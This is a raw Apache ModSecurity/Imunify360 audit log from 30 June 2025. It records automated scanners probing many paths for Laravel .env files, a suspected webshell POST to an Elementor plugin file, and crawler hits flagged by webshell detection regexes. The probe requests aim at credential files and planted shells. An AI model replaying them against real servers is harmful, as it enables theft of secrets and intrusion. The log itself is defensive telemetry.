(KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --ec0d354a-C-- 0x%5B%5D=DTAB --ec0d354a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ec0d354a-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281402170865 140730 (- - -) Stopwatch2: 1751281402170865 140730; combined=2120, p1=149, p2=1577, p3=0, p4=0, p5=394, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ec0d354a-Z-- --3e13bb32-A-- [30/Jun/2025:16:33:22.508602 +0530] aGJu-p4tZwI9VhjyFFR7ewAAAEI 20.171.207.232 33346 192.168.74.40 443 --3e13bb32-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3e13bb32-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3e13bb32-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --68a34032-Z-- --580e3451-A-- [30/Jun/2025:16:33:23.917214 +0530] aGJu-yr_VjbCfxeXLc8cDwAAAE8 192.253.209.75 54627 192.168.74.40 443 --580e3451-B-- GET /fedex/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --580e3451-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --580e3451-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281403867423 50182 (- - -) Stopwatch2: 1751281403867423 50182; combined=1009, p1=114, p2=711, p3=0, p4=0, p5=184, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --580e3451-Z-- --7edd727b-A-- [30/Jun/2025:16:33:25.604693 +0530] aGJu_YsgL1eZWVHBbmiYJwAAABg 192.253.209.54 7465 192.168.74.40 443 --7edd727b-B-- POST /fedex/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --7edd727b-C-- 0x%5B%5D=DTAB --7edd727b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --7edd727b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281405548027 60971 (- - -) Stopwatch2: 1751281405548027 60971; combined=2458, p1=167, p2=1777, p3=0, p4=0, p5=513, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --7edd727b-Z-- --892b3d0d-A-- [30/Jun/2025:16:33:26.223863 +0530] aGJu_p4tZwI9VhjyFFR7fgAAAEI 20.171.207.232 33346 192.168.74.40 443 --892b3d0d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/testimonials/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --892b3d0d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --892b3d0d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/testimonials/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --8f22b87b-Z-- --d49b8730-A-- [30/Jun/2025:16:33:27.899497 +0530] aGJu_xcq64WljHnUEmPYAwAAABQ 192.253.209.55 31065 192.168.74.40 443 --d49b8730-B-- GET /__tests__/test-become/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --d49b8730-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --d49b8730-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281407845940 53754 (- - -) Stopwatch2: 1751281407845940 53754; combined=1086, p1=122, p2=756, p3=0, p4=0, p5=208, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d49b8730-Z-- --6dfb0d7d-A-- [30/Jun/2025:16:33:28.545351 +0530] aGJvAJ4tZwI9VhjyFFR7gAAAAEI 20.171.207.232 33346 192.168.74.40 443 --6dfb0d7d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/festivals-calendar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --6dfb0d7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6dfb0d7d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/festivals-calendar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/festivals-calendar.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281408527966 17844 (- - -) Stopwatch2: 1751281408527966 17844; combined=4020, p1=169, p2=3673, p3=0, p4=0, p5=178, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6dfb0d7d-Z-- --60708a24-A-- [30/Jun/2025:16:33:29.428001 +0530] aGJvAUVAU9RF2CQHMHStOQAAAB8 192.253.209.69 40189 192.168.74.40 443 --60708a24-B-- POST /__tests__/test-become/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --60708a24-C-- 0x%5B%5D=DTAB --60708a24-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --60708a24-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281409334625 94094 (- - -) Stopwatch2: 1751281409334625 94094; combined=1645, p1=177, p2=1042, p3=0, p4=0, p5=425, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --60708a24-Z-- --09252029-A-- [30/Jun/2025:16:33:29.739637 +0530] aGJvAZ4tZwI9VhjyFFR7gQAAAEI 20.171.207.232 33346 192.168.74.40 443 --09252029-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --09252029-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --09252029-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --09252029-Z-- --ebe3d27c-A-- [30/Jun/2025:16:33:30.861489 +0530] aGJvAir1CSM-0VW7K7_L8QAAADk 192.253.209.84 10461 192.168.74.40 443 --ebe3d27c-B-- GET /local/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --ebe3d27c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ebe3d27c-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281410817168 44819 (- - -) Stopwatch2: 1751281410817168 44819; combined=816, p1=97, p2=541, p3=0, p4=0, p5=177, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --ebe3d27c-Z-- --2e6b1d54-A-- [30/Jun/2025:16:33:30.898417 +0530] aGJvAp4tZwI9VhjyFFR7ggAAAEI 20.171.207.232 33346 192.168.74.40 443 --2e6b1d54-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/luxury.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --2e6b1d54-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2e6b1d54-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/luxury.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/luxury.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281410881428 17438 (- - -) Stopwatch2: 1751281410881428 17438; combined=4066, p1=131, p2=3675, p3=0, p4=0, p5=259, sr=57, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5b815a77-Z-- --0969ce07-A-- [30/Jun/2025:16:33:32.265182 +0530] aGJvBLhjfRvDaLf6SuFSiwAAACQ 192.253.209.100 59757 192.168.74.40 443 --0969ce07-B-- POST /local/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --0969ce07-C-- 0x%5B%5D=DTAB --0969ce07-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --0969ce07-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281412209564 55809 (- - -) Stopwatch2: 1751281412209564 55809; combined=2302, p1=184, p2=1854, p3=0, p4=0, p5=264, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0969ce07-Z-- --b22e8461-A-- [30/Jun/2025:16:33:33.231356 +0530] aGJvBZ4tZwI9VhjyFFR7hAAAAEI 20.171.207.232 33346 192.168.74.40 443 --b22e8461-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/festivals-calendar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b22e8461-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b22e8461-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/festivals-calendar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b22e8461-Z-- --1975d726-A-- [30/Jun/2025:16:33:33.353246 +0530] aGJvBafzaFMtHKwfAoXHEAAAAGI 192.253.209.102 20449 192.168.74.40 443 --1975d726-B-- GET /rest/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --1975d726-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --1975d726-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281413300250 53468 (- - -) Stopwatch2: 1751281413300250 53468; combined=982, p1=95, p2=694, p3=0, p4=0, p5=192, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --1975d726-Z-- --9b1bbc3f-A-- [30/Jun/2025:16:33:34.602512 +0530] aGJt2gnPgTBgKHWF5Rm7CgAAACc 167.99.229.202 35834 192.168.74.40 443 --9b1bbc3f-B-- POST /wp-content/plugins/elementor/core/common/modules/connect/apps/base.app.php HTTP/1.1 Host: lovedale.us sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 3600 Content-Type: application/x-www-form-urlencoded --9b1bbc3f-C-- secure_access= -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9b1bbc3f-Z-- --3b5b5d76-A-- [30/Jun/2025:16:33:34.803353 +0530] aGJvBmCECAzpimnDb-m5OAAAABc 192.253.209.89 41557 192.168.74.40 443 --3b5b5d76-B-- POST /rest/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --3b5b5d76-C-- 0x%5B%5D=DTAB --3b5b5d76-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3b5b5d76-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281414723876 81906 (- - -) Stopwatch2: 1751281414723876 81906; combined=2247, p1=168, p2=1633, p3=0, p4=0, p5=445, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3b5b5d76-Z-- --21033506-A-- [30/Jun/2025:16:33:35.618989 +0530] aGJvB54tZwI9VhjyFFR7hgAAAEI 20.171.207.232 33346 192.168.74.40 443 --21033506-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --21033506-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --21033506-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/js/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d1af0104-Z-- --4090117f-A-- [30/Jun/2025:16:33:39.777861 +0530] aGJvCyCWOMSsVhQe6kdOigAAACA 192.253.209.91 6007 192.168.74.40 443 --4090117f-B-- GET /sources/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --4090117f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --4090117f-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281419722369 55765 (- - -) Stopwatch2: 1751281419722369 55765; combined=914, p1=133, p2=559, p3=0, p4=0, p5=222, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --4090117f-Z-- --05edea2b-A-- [30/Jun/2025:16:33:40.206699 +0530] aGJvDJ4tZwI9VhjyFFR7igAAAEI 20.171.207.232 33346 192.168.74.40 443 --05edea2b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --05edea2b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --05edea2b-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
